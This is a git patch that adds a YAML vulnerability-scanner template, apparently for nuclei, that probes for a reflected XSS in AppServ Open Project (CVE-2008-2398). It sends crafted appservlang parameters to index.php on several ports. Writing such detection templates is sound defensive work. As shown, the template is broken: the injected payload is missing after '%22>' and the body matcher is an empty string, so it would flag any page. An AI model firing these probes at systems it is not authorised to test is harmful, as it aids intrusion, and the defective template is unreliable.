From 8c9ce49b2dd50e28829b0cc330d4a7f1aafbbcdf Mon Sep 17 00:00:00 2001 From: shubham chaskar <48474764+unstabl3@users.noreply.github.com> Date: Wed, 16 Dec 2020 01:20:04 +0530 Subject: [PATCH] cve-2008-2398 added --- cves/CVE-2008-2398.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 cves/CVE-2008-2398.yaml diff --git a/cves/CVE-2008-2398.yaml b/cves/CVE-2008-2398.yaml new file mode 100644 index 0000000000..1b8dd874f1 --- /dev/null +++ b/cves/CVE-2008-2398.yaml @@ -0,0 +1,22 @@ +id: cve-2008-2398 + +info: + name: AppServ Open Project 2.5.10 and earlier XSS + author: unstabl3 + severity: medium + +requests: + - method: GET + path: + - "{{BaseURL}}:8181/index.php?appservlang=en%22>" + - "{{BaseURL}}:8081/index.php?appservlang=en%22>" + - "{{BaseURL}}:443/index.php?appservlang=en%22>" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "" + part: body